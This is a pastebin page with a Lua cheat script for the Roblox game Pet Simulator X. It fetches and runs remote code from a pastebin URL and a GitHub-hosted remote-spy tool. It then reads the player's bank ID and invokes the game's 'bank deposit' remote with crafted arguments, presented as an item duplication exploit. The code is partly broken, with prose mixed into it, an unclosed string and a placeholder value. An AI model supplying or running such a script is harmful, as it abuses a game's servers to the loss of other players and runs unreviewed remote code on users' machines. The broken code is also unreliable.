Facebook
From progiant52, 1 Year ago, written in Lua.
This paste is a reply to petsimxx from lund - view diff
Embed
Download Paste or View Raw
Hits: 420
  1. loadstring(game:HttpGet("https://pastebin.com/raw/ASBFwWWp"))()--BROUGHT TO YOU BY rbxscript.com!-
  2.  
  3.  
  4. Recognizing our BankID
  5. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  6.  
  7. local mybanks = lib.Network.Invoke("get my banks")
  8. local BankID = mybanks[1]['BUID']
  9. setclipboard(BankID)
  10. Script for finding pet IDs
  11. loadstring(game:HttpGet("https://github.com/exxtremestuffs/SimpleSpySource/raw/master/SimpleSpy.lua))()
  12. The dup script itself
  13. local args = {
  14.    [1] = {
  15.        [1] = "here_bankid",
  16.        [2] = {},
  17.        [3] = number of hemes
  18.    }
  19. }
  20. workspace.THINGS.REMOTES:FindFirstChild("bank deposit"):InvokeServer(unpack(args))
  21.    

Replies to Re: petsimxx rss

Title Name Language When
Re: Re: petsimxx Corrupt Butterfly lua 1 Year ago.